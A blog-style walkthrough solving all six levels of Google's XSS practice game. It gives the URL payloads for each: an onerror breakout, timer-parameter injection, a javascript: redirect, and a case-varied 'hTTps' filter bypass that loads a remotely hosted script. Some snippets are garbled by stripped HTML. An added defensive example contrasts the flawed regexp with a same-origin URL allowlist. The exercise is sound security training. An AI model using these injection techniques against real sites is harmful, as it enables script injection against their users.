I'm just going to solve the XSS game with help from Sujeet - TopicsExpress

I'm just going to solve the XSS game with help from Sujeet Haxor.

Target: https://xss-game.appspot/level1

Solution:

Level 1

This is the most obvious and easiest one. Just insert the following code and you're done:

    alert(1)

Level 2

Since the script won't work, you'll have to think of other tags to trigger JavaScript code execution. The first thing that came to mind was to use img tags along with the onerror attribute. Here you go:

Level 3

Well, this time I had to read some code in order to understand the application's logic. If you toggle the code you'll see index.html:

    [...]
    function chooseTab(num) {
      // Dynamically load the appropriate image.
      var html = "Image " + parseInt(num) + ;
      html += ;
      $('#tabContent').html(html);
    [...]

As you see, the num parameter is used to generate the img tag. The idea was to break out of the quotes and insert some sneaky JavaScript code. Again I've used the onerror attribute to insert JS. Insert this into the URL address bar and you'll get your alert():

    https://xss-game.appspot/level3/frame#3 onerror=alert(1);

Level 4

This is quite tricky. This time I have followed the provided hints. Having the JS console activated and requesting https://xss-game.appspot/level4/frame?timer= showed me the following output:

    SyntaxError: unterminated string literal
    startTimer();

Obviously there is again a way to escape the function and append the alert() call. I have tried several things:

    https://xss-game.appspot/level4/frame?timer=);
    SyntaxError: unterminated string literal
    startTimer());

    https://xss-game.appspot/level4/frame?timer=);
    SyntaxError: unterminated string literal
    startTimer());

And then I've decided to use some URL encoding: %3B represents the semicolon.

    https://xss-game.appspot/level4/frame?timer=)%3B
    SyntaxError: unterminated string literal
    startTimer(););

Aha... There you go! We can terminate the call and insert other ones.
The final request:

    https://xss-game.appspot/level4/frame?timer=)%3Balert(1)%3Bvar b=(

which resulted in

    startTimer();alert(1);var b=();

I must admit: Nice one!

Level 5

This one was quite easy. On the first page you can see a link: https://xss-game.appspot/level5/frame/signup?next=confirm. Now let's have a look at how this next parameter is used in confirm.html:

    [...]
    setTimeout(function() { window.location = {{ next }}; }, 5000);
    [...]

So window.location is set based on the next parameter. This is a typical case for DOM based XSS. Besides that, we have in signup.html:

    [...]
    Next >>
    [...]

Again the next parameter is used as the target of an a tag. OK, enough bla bla. Here is the PoC:

1. Go to https://xss-game.appspot/level5/frame/signup?next=javascript:alert(1)
2. Insert your mail
3. Click Next >>

Level 6

This time I had to figure out how to host my JS code. So I've used pastebin to host my evil code. Next I had a look at the code. As you can read, a new script tag is created and the src attribute is set appropriately. The only catch about it: You're not allowed to have a URL containing https?:

    [...]
    if (url.match(/^https?:\/\//)) {
      setInnerText(document.getElementById('log'),
        "Sorry, cannot load a URL containing \"http\".");
      return;
    }
    [...]

Afterwards the text after the hash is used as the script's src:

    // Load this awesome gadget
    scriptEl.src = url;

Have you noticed something about the regexp? No?! Seriously not? OK. The match doesn't account for letter case. You can escape it by using hTTps or any other combination. So the final PoC:

    https://xss-game.appspot/level6/frame#htTps://pastebin/raw.php?i=15S5qZs0

Conclusion

This was a great game to play with. After all, I must say the levels were not that difficult, but a really good opportunity to refresh my XSS skills :)

Thanks Sujeet Haxor : https://xss-game.appspot/done
Posted on: Sat, 13 Sep 2014 09:39:42 +0000
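
The URL handling from Level 5 (the next parameter) and Level 6 (the script src check), as an added example that is not part of the original post or the game's code: the prefix regexp quoted in Level 6 beside a parser-based same-origin allowlist. ORIGIN, weakCheck, isSameOriginUrl and the sample URLs are hypothetical names and constructed values.

```javascript
// Added example. ORIGIN and all sample URLs are constructed for illustration.
const ORIGIN = 'https://app.example';

// The Level 6 check as quoted in the post: a case-sensitive prefix match.
// Returns true when the filter would let the value through.
function weakCheck(url) {
  return !url.match(/^https?:\/\//);
}

// Hardened form: let the URL parser normalise the value (scheme case,
// relative paths), then accept only http(s) targets on our own origin.
// This is an allowlist, so schemes such as javascript: fail by default.
function isSameOriginUrl(value, base = ORIGIN) {
  let parsed;
  try {
    parsed = new URL(value, base);
  } catch (e) {
    return false; // unparsable input is rejected, not passed through
  }
  if (parsed.protocol !== 'https:' && parsed.protocol !== 'http:') {
    return false;
  }
  return parsed.origin === new URL(base).origin;
}

// Constructed inputs mirroring the cases in the post, plus benign values.
const samples = [
  'https://cdn.example.net/x.js', // lowercase scheme: the regexp catches it
  'hTTps://cdn.example.net/x.js', // mixed-case scheme (Level 6)
  'javascript:alert(1)',          // script URL in next (Level 5)
  '/static/gadget.js',            // same-origin path
  'confirm',                      // relative target, as in next=confirm
];

// One row per input: what each check decides.
function compare() {
  return samples.map((url) => ({
    url,
    weakAllows: weakCheck(url),
    hardenedAllows: isSameOriginUrl(url),
  }));
}

console.table(compare());
```

The same function can gate both sinks: call it before assigning window.location or a script element's src, and fall back to a fixed default when it returns false.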